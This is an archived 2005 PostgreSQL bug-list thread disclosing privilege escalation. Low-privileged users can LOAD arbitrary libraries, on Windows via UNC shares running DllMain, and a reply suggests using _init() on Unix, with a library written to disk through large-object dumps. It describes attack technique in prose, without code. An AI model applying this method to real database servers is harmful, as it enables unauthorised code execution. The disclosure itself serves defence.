_init() is the equivalent of DllMain on Linux/etc; in fact the other database server I was looking at is vulnerable to this exact problem. If postgresql accepts CLOB/BLOB input from a client to a table and then can dump to disk you might be able to achieve it that way - which is how I did it on the other rdbms.
Cheers,
David
----- Original Message ----- From: "John Heasman" <[EMAIL PROTECTED]>
To: <pgsql-bugs@postgresql.org>
Cc: <[EMAIL PROTECTED]>
Sent: Friday, January 21, 2005 7:08 PM
Subject: Privilege escalation via LOAD
Hi guys,
It appears that low privileged users can invoke the LOAD extension to load arbitrary libraries into the postgres process space. On Windows systems this is achieved by calling LoadLibrary (src/backend/port/dynloader/win32.c). The effect of this is that DllMain will be executed. Since LOAD takes an absolute path, UNC paths may be used on Windows, thus a low privileged database user can load an arbitrary library from an anonymous share they have set up, escalating to the privileges of the database user. I am still investigating the impact on Unix.
Cheers
John
(this vulnerability was born out of a discussion on #postgresql between myself, lurka and dennisb).
---------------------------(end of broadcast)--------------------------- TIP 2: you can get off all lists at once with the unregister command (send "unregister YourEmailAddressHere" to [EMAIL PROTECTED])
